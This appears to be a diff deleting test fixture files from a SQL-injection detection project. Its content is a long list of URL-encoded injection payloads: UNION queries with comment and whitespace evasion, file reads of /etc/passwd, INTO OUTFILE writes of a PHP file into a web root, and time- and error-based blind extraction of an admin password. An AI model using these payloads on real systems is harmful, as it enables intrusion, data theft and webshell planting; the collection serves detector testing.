||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%27%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%231aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%231a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%231a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23--1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23--%20-1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%20union%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union
|
||||
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%0Aunion%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23union%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23feafafeas%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23feafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--eafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--eafafeas%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20union%28%20select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20table_name%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20all%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%23%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20select%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0Cselect%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0C%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0C-%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1--%0D%0A%20union%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27union%20select%20us3rs%20from%20table1
|
||||
%27-%40aa1-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40UNION1-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841-%40%D0%B0%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a1%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2-%40a3%5E%40a3%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2-%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2%5E%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%401%20union%20select%20us3rs%20from%20table1
|
||||
%27-%401%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select-table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29
|
||||
-1%20union%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
%27-%40a1%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%23%20union%20%20%20%0D%0Aun%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%23%0D%0A%0D%0Aunion
|
||||
-1%23%0D%0A%0D%0Aunion%20%23
|
||||
-1%23%0D%0A%0D%0Aunion%20%23%0D%0A%23
|
||||
-1%23%0D%0Aunion%20%23%0D%0A%23
|
||||
-1%23union%20%23%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0Aunion
|
||||
#-1%23union%20%23%23%0D%0A---%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23unn%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0A/%2A%2A/union%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A%23/%0D%0A/%2A%2A/union%23--
|
||||
-1%23union%20%23%23%0D%0A/1/%2A%2A/union%23--
|
||||
-11/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union%23--
|
||||
-1/1/%2A%2A/union%23--
|
||||
1/1/%2A%2A/union%23--
|
||||
-11/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
-1%0D%0A/1/%2A%2A/union%23
|
||||
-1%0D%0A/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
1/1/%2A%2A/union
|
||||
%0D%0A1/1/%2A%2A/union
|
||||
0-%0D%0A1/1/%2A%2A/union
|
||||
0x1-%0D%0A1/1/%2A%2A/union
|
||||
0x1%20-%0D%0A1/1/%2A%2A/union
|
||||
test%27-%0D%0A1/1/%2A%2A/union%20select
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
1-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
0-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
%27select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
%27-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
-1.select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27%23
|
||||
%27%20into%20outfile%20%0D%0A%27/var/www/aa.php%27
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20a%20from%20b
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27union%20select%20
|
||||
%27union%20select
|
||||
%22union%20select
|
||||
1%20union%20select
|
||||
%40a%20union%20select
|
|
@ -1,4 +0,0 @@
|
|||
# various things for http://www-01.ibm.com/support/knowledgecenter/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm
|
||||
#
|
||||
UNION ALL SELECT FileToClob("/etc/passwd", "server")::html,0
|
||||
UNION ALL SELECT FileToBlob("/etc/passwd", "server")::html,0
|
|
@ -1,20 +0,0 @@
|
|||
# solar empire attack
|
||||
# http://www.exploit-db.com/exploits/4078/
|
||||
|
||||
# these use the multiple insert syntax
|
||||
# INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) ....
|
||||
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
|
||||
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
|
||||
# $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)"
|
||||
|
||||
F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# numeric version
|
||||
999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# arg switch
|
||||
F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# arg switch + numeric
|
||||
999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
|
|
@ -1,8 +0,0 @@
|
|||
# http://isc.sans.edu/diary.html?storyid=12127
|
||||
189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip----
|
||||
189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip----
|
||||
189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip----
|
||||
189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip----
|
||||
|
||||
# http://isc.sans.edu/diary.html?storyid=11011
|
||||
999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536--
|
|
@ -1,7 +0,0 @@
|
|||
#
|
||||
# Yong Deng reported 2016-10-20
|
||||
#
|
||||
# Tests that "left" is treated as a function
|
||||
#
|
||||
# http://www.w3resource.com/mysql/string-functions/mysql-left-function.php
|
||||
1'and left(database(),2)>'sa'--+
|
|
@ -1,640 +0,0 @@
|
|||
#
|
||||
# Misc collected attacks from the wild and beyond....
|
||||
#
|
||||
SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29
|
||||
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
|
||||
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
|
||||
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
|
||||
PHPX+AND+1%3D1+AND+XX%3DX
|
||||
PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX
|
||||
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27
|
||||
SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
|
||||
materials'%20and%201=1%20and%20''='
|
||||
materials'%20and%201=2%20and%20''='
|
||||
1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
|
||||
-999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x
|
||||
|
||||
# not sql
|
||||
#5000224%27%20UNION%20user_id%3E0--
|
||||
|
||||
-5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0//
|
||||
|
||||
# not sql
|
||||
#-5000224%27%20UNION%20user_id%3E0--
|
||||
5000224%27%20or%201=1--
|
||||
8+and+1=1--
|
||||
8+order+by+1--
|
||||
8-999.9+union+select+0
|
||||
9-999.9+union+select+0--
|
||||
6334588%00%27%7C%7CSLEEP%283%29%26%26%271
|
||||
6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29
|
||||
6334588%26%26SLEEP%283%29
|
||||
6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271
|
||||
6334588%27%20AND%20SLEEP%283%29%20AND%20%271
|
||||
6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35
|
||||
6444930%20%61%6E%64%20%36%3D%36
|
||||
6444930%27%20%61%6E%64%20%27%36%27%3D%27%35
|
||||
6444930%27%20%61%6E%64%20%27%36%27%3D%27%36
|
||||
FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045
|
||||
1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29
|
||||
1234.5%29+ORDER+BY+1
|
||||
FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29
|
||||
FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596
|
||||
FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29
|
||||
FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29
|
||||
